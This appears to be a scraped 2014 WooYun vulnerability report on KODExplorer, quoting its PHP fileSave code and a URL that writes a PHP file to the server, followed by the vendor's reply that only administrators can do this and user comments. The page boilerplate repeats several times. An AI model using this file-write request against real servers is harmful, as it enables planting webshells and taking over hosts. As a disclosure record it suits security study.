芒果云KODExlporer getshell(二） | wooyun-2014-076310| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076310

漏洞标题：芒果云KODExlporer getshell(二）

漏洞作者：狗狗侠

提交时间：2014-09-17 13:58

修复时间：2014-12-16 14:00

公开时间：2014-12-16 14:00

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-17：细节已通知厂商并且等待厂商处理中
2014-09-17：厂商已经确认，细节仅向厂商公开
2014-09-20：细节向第三方安全合作伙伴开放
2014-11-11：细节向核心白帽子及相关领域专家公开
2014-11-21：细节向普通白帽子公开
2014-12-01：细节向实习白帽子公开
2014-12-16：细节向公众公开

简要描述：

来第二弹getshell
别又是虚假漏洞？

详细说明：

代码留给厂商看
这是在editor.class.php当中的

public function fileSave(){
		$filestr = rawurldecode($this->in['filestr']);
		//echo $filestr.'-------------';exit();
		$charset = $this->in['charset'];
		$path =_DIR($this->in['path']);
		//echo $path;exit();
		//echo $path;
		//echo is_writable($path);exit();
		if (!is_writable($path)) show_json($this->L['no_permission_write'],false);
		//phpinfo();
		//echo $path.'----aaa';exit();
		if ($charset !='' || $charset != 'utf-8') {
			$filestr=mb_convert_encoding($filestr,$this->in['charset'],'utf-8');
		}
		//echo $path.'----aaa';exit();
		$fp=fopen($path,'wb');
		fwrite($fp,$filestr);
		fclose($fp);
		show_json($this->L['save_success']);

获取字符串$filestr = rawurldecode($this->in['filestr']);
$path =_DIR($this->in['path']); 获取路径。。。
其中跟踪留给厂商。。。
直接写shell
给出语句如下：
http://localhost/www/index.php?editor/fileSave&path=./test.php&filestr=%3C?php%20phpinfo%28%29;?%3E

其他的自己测

漏洞证明：

修复方案：

版权声明：转载请注明来源狗狗侠@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2014-09-17 14:45

厂商回复：

之前已经解释过，管理员拥有服务器最高权限；
通过界面就可以新建php文件，然后打开，在线写代码然后调试等等。何必构造一个url
本来只是自己用的一个工具，开源后应用户需求加入了多用户……
唉，还是懒得解释了

漏洞评价：

2014-09-17 14:52 | 千帆网络工作室(乌云厂商)

管理员拥有最高权限，这是程序的功能；非管理员做了权限限制（包括路径操作、上传下载读取写入等对扩展名做了限制），如果通过demo用户来实现了提权等操作认为是漏洞。
2014-09-17 15:51 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

@千帆网络工作室这样的也可以确认啊...
2014-09-17 16:02 | 千帆网络工作室(乌云厂商)

@Bird 还是感谢洞主的认真与执着。
2014-09-17 16:07 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

@千帆网络工作室哈～
2014-09-17 19:39 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

这个漏洞是在管理员权限下进行的？
2014-09-17 21:56 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

@疯狗好像是- -
2014-09-17 21:56 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

@疯狗所以大概称不上是漏洞。。。
2014-09-17 22:02 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

@疯狗对啦，求给通用型- - 他们都给了啊- - 我的为啥不算，，，http://wooyun.org/bugs/wooyun-2014-066056http://wooyun.org/bugs/wooyun-2014-066077
2014-09-20 23:35 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云，知恩不忘，其实我一直都在乌云默...)

@疯狗看了一下好像是哟

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076310

漏洞标题：芒果云KODExlporer getshell(二）

相关厂商：千帆网络工作室

漏洞作者：狗狗侠

提交时间：2014-09-17 13:58

修复时间：2014-12-16 14:00

公开时间：2014-12-16 14:00

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源狗狗侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076310

漏洞标题：芒果云KODExlporer getshell(二）

相关厂商：千帆网络工作室

漏洞作者： 狗狗侠

提交时间：2014-09-17 13:58

修复时间：2014-12-16 14:00

公开时间：2014-12-16 14:00

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-076310"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 狗狗侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：狗狗侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源狗狗侠@乌云